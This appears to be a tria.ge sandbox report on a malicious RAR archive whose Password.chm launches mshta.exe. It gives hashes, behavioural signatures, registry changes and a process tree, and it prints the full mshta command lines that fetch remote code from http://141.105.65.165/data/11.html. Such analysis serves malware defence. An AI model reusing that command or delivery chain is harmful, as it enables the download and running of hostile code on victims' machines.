Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
263s -
max time network
265s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
21/03/2023, 18:34
Static task
static1
Behavioral task
behavioral1
Sample
df5e4a1c071b30ddca796b7cf550368584d8a1cd3e0bb36481bfc2e70adfddd5.rar
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
df5e4a1c071b30ddca796b7cf550368584d8a1cd3e0bb36481bfc2e70adfddd5.rar
Resource
win10v2004-20230220-en
General
-
Target
df5e4a1c071b30ddca796b7cf550368584d8a1cd3e0bb36481bfc2e70adfddd5.rar
-
Size
20KB
-
MD5
e9230cf7615338ab037719646d67351b
-
SHA1
12103bc077f677afb2ba7fac6445df3dd2f6df00
-
SHA256
df5e4a1c071b30ddca796b7cf550368584d8a1cd3e0bb36481bfc2e70adfddd5
-
SHA512
ea105a506746142d84622e73af65992abb12b1c78810d8d9814f4e34434aa4886faf8bf52938bf307d04d235676e4751c8c2f635600e42d434f1f458d5e8188c
-
SSDEEP
384:eADnJetU1vItt31ye18De7iKncEHAUuOeja4zj6acJP7D8ynXITubFoxZ:eAj8O1vItZ1ye1T7ier/uOFc6FJPkGXW
Malware Config
Extracted
http://141.105.65.165/data/11.html
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 44 3312 mshta.exe 53 3848 mshta.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies registry class 3 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000_Classes\Local Settings OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000_Classes\Local Settings OpenWith.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeRestorePrivilege 3628 7zG.exe Token: 35 3628 7zG.exe Token: SeSecurityPrivilege 3628 7zG.exe Token: SeSecurityPrivilege 3628 7zG.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 3628 7zG.exe -
Suspicious use of SetWindowsHookEx 22 IoCs
pid Process 1460 OpenWith.exe 1460 OpenWith.exe 1460 OpenWith.exe 1460 OpenWith.exe 1460 OpenWith.exe 1460 OpenWith.exe 1460 OpenWith.exe 1460 OpenWith.exe 1460 OpenWith.exe 1460 OpenWith.exe 1460 OpenWith.exe 1460 OpenWith.exe 1460 OpenWith.exe 1460 OpenWith.exe 1460 OpenWith.exe 1460 OpenWith.exe 1460 OpenWith.exe 1460 OpenWith.exe 1460 OpenWith.exe 4272 hh.exe 4272 hh.exe 3296 OpenWith.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 4272 wrote to memory of 3312 4272 hh.exe 104 PID 4272 wrote to memory of 3312 4272 hh.exe 104 PID 4272 wrote to memory of 3848 4272 hh.exe 106 PID 4272 wrote to memory of 3848 4272 hh.exe 106
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\df5e4a1c071b30ddca796b7cf550368584d8a1cd3e0bb36481bfc2e70adfddd5.rar1⤵
- Modifies registry class
PID:4992
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1460
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:1284
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\df5e4a1c071b30ddca796b7cf550368584d8a1cd3e0bb36481bfc2e70adfddd5\" -ad -an -ai#7zMap18022:186:7zEvent6441⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3628
-
C:\Windows\hh.exe"C:\Windows\hh.exe" C:\Users\Admin\Desktop\df5e4a1c071b30ddca796b7cf550368584d8a1cd3e0bb36481bfc2e70adfddd5\Password.chm1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4272 -
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" http://141.105.65.165/data/11.html ,2⤵
- Blocklisted process makes network request
PID:3312
-
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" http://141.105.65.165/data/11.html ,2⤵
- Blocklisted process makes network request
PID:3848
-
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3296
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\Desktop\df5e4a1c071b30ddca796b7cf550368584d8a1cd3e0bb36481bfc2e70adfddd5\Password.chm
Filesize10KB
MD5b39182a535f41699280ca088eef0f258
SHA1e1d570867afe13dcd4a9193a23c1deee384eb342
SHA256ff0d4259510d8b9d6e43cec5224d72570f3b4e17ebd7f0c1ad1922748dec15e6
SHA512b084b53dd6f25ae066b60b4e4a8037d7e9eeea7fa02acf4518289b98f106a7872fae1d5d731ada5ecbb7589f6dc221cf162143702f0650caad098eab6ddfbd91